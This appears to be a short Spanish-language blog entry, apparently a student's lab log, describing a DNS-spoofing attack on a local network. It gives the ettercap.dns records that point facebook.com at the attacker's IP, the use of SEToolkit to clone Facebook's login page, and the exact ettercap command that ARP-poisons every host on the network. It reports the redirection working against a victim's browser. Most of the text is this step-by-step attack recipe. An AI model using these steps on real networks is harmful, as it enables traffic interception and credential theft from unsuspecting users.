Hoy hemos conseguido realizar la búsqueda por nombre en la
victima. Y no rer
Para hacer DNS_Spoof correctamente no hace falta instalar BIND9, simplemente necesitamos SETOOLKIT (fake
pagina) y ETTERCAP desde terminal (DNS y ARP spoofing).
Primero configuraremos el ficherito ettercap.dns que esta ubicado
en: /etc/ettercap. Dentro del fichero creamos tres lineas con los
siguientes parametros:
facebook.com A IP_atacante
*.facebook.com A IP_atacante
www.facebook.com PTR IP_atacante
Una vez modificado correctamente el fichero ettercap.dns,
nos vamos a la herramienta setoolkit y crearemos el fake
de la pagina, simplemente indicando nuestra ip, y el nombre de la web
que queremos copiar en nuestro caso www.facebook.com.
Una vez tengamos el fake de "www.facebook.com" creado
(como
hacerlo), abriremos la terminal de kali linux y escribiremos
el siguiente comando para iniciar el ataque: ettercap -T -q -i
eth0 -P dns_spoof -M arp //
Con esto envenenaremos a toda la red, clonando la MAC
del router y así reciviendo todas las peticiones. Finalmente funciona correctamente, y si en el navegador del cliente, escribimos facebook.com nos redirige hacia nuestra web falsa correctamente.
Cap comentari:
Publica un comentari a l'entrada